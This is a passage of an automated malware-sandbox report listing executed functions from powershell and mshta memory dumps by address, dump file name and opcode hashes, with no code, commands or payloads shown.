                                                                                                    • Snapshot File: hcaresult_5_2_7fe89ac0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4466dbffdfbd678581ac8c6ed2b89c8e8a5e03c5ea2707c612b3afb0371eefcd
                                                                                                    • Instruction ID: 5cfb187a5c546a151e2abbb30289c2a129cd69792d8c131f500afba07f2a8b01
                                                                                                    • Opcode Fuzzy Hash: 4466dbffdfbd678581ac8c6ed2b89c8e8a5e03c5ea2707c612b3afb0371eefcd
                                                                                                    • Instruction Fuzzy Hash: F872353090D7DA0FEB1AA72858512B97FE1EF47758F1900EBD48FCB1A3DA186816C352

                                                                                                    Executed Functions

                                                                                                    Function 02740FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000003.470547836.0000000002740000.00000010.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_3_2740000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction ID: ccbe6c735d084cb4ca37b226a30cbd88bced522cd814d5a0b9cf9c179a8442b0
                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Function 02740FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000003.470547836.0000000002740000.00000010.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_3_2740000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction ID: ccbe6c735d084cb4ca37b226a30cbd88bced522cd814d5a0b9cf9c179a8442b0
                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Function 02740FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000003.470547836.0000000002740000.00000010.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_3_2740000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction ID: ccbe6c735d084cb4ca37b226a30cbd88bced522cd814d5a0b9cf9c179a8442b0
                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Function 02740FA9 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000003.470547836.0000000002740000.00000010.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_3_2740000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction ID: ccbe6c735d084cb4ca37b226a30cbd88bced522cd814d5a0b9cf9c179a8442b0
                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction Fuzzy Hash: